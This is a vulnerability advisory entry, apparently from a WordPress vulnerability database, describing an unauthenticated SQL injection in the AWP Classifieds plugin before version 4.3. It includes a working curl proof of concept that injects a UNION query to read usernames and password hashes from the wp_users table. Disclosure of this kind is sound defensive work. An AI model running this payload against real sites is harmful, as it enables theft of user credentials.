WordPress Plugin Vulnerabilities
AWP Classifieds Plugin < 4.3 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape some parameters before using them in a SQL statement via an AJAX action available to unauthenticated users and when a specific premium module is active, leading to a SQL injection
Proof of Concept
To read the user_login and user_pass columns from the wp_users table: curl -i 'https://example.com/wp-admin/admin-ajax.php?action=awpcp-get-regions-options&parent_type=country&context=search&parent=Algeria&type=user_login`+FROM+wp_users+UNION+ALL+SELECT+user_pass+FROM+wp_users;--+-'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-10 (about 1 years ago)
Added
2022-10-10 (about 1 years ago)
Last Updated
2022-10-10 (about 1 years ago)